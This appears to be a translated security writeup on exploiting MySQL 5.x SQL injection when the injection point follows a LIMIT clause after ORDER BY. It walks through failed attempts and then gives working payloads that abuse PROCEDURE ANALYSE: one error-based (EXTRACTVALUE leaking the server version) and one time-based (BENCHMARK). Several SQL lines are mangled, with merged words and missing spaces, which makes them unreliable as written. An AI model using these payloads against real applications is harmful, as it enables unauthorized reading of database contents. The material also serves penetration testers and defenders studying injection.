How MySQL injection points are used after the Limit keyword

There are numerous articles describing the methods of SQL injection utilization, and this article will describe a special scenario.

Details

In a test, I ran into a SQL injection problem, there is no solution on the Internet, then the injection point is after the Limit keyword, the database is Mysql5.x,sql statement similar to the following:

Select field from table WHERE ID > 0 ORDER by ID LIMIT "injection point"

The point of the problem is that there is an order by keyword in the statement, and we know that in MySQL we can use the Union keyword in front of order by, so if there is no ORDER by keyword in front of the injection point, the Union keyword can be used smoothly, but now is the case There is an ORDER by keyword in front of the injection point, which is discussed on both StackOverflow and sla.ckers, but there is no effective solution.

Let's take a look at the syntax of select in the MySQL 5.x documentation:

SELECT    [All | DISTINCT | Distinctrow]      [high_priority]      [Straight_join]      [Sql_small_result] [Sql_big_result] [Sql_buffer_result]      [Sql_cache | Sql_no_cache] [sql_calc_found_rows]select_expr[, select_expr ...]    [From table_references [WHERE where_condition]    [GROUP by {col_name | expr | position} [ASC | DESC], ...[With ROLLUP]]    [Having where_condition]    [ORDER by {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[Offset,]Row_count|row_count offset (offset}] [PROCEDURE procedure_name (argument_list)]    [into OUTFILE ' file_name ' export_options | Into DumpFile ' file_name ' | into Var_name [, Var_name]]    [For UPDATE | LOCK in SHARE MODE]]

The Limit keyword is followed by the PROCEDURE and into keywords, the INTO keyword can be used to write files, but this is not important in this article, the focus here is the PROCEDURE keyword. MySQL default available stored procedures are only analyse (DOC).

Try using this stored procedure:

MySQL>SELECTfromtablewhere>0ORDER by 1,1PROCEDURE Analyse (11386 ( HY000): Can't use ORDER clause with this procedure

Analyse supports two parameters, try two parameters:

 mysql>  select  field from  table  where  ID >  0  order  by  ID LIMIT 1 , 1  procedure  analyse (1 , 1   1386  (HY000): Can  " t use ORDER clause with this procedure still invalid, attempt to insert SQL statement in analyse: 
  

mysql> select field from table where ID > 0 ORDER BY ID LIMIT procedure Analyse ((SELECT IF (MID version (), p) LI KE 5, Sleep (5), 1)), 1);

The response is as follows:

ERROR 1108 (HY000): Incorrect parameters to procedure ' analyse '

It turns out that sleep was not executed, and eventually I tried the following payload:

Mysql> SELECTField from User WHEREId>0 ORDER  byID LIMIT1,1 procedureAnalyse (Extractvalue (Rand(), Concat (0x3a, version ())),1); ERROR1105(HY000): XPATH syntax error:': 5.5.41-0ubuntu0.14.04.1'

Aha, the above method is a common error injection, so if the injection point support error, then all the problems are OK, but if the injection point is not an error, you can also use time-based injection, payload as follows:

SELECTField from Table WHEREId> 0 ORDER  byID LIMIT1,1 PROCEDUREAnalyse ((SelectExtractvalue (Rand(), Concat (0x3a,(IF(MID (version (),1,1) like 5, BENCHMARK (5000000, SHA1 (1)),1))))),1)

Interestingly, it is not possible to use sleep and only use BENCHMARK.

How MySQL injection points are used after the Limit keyword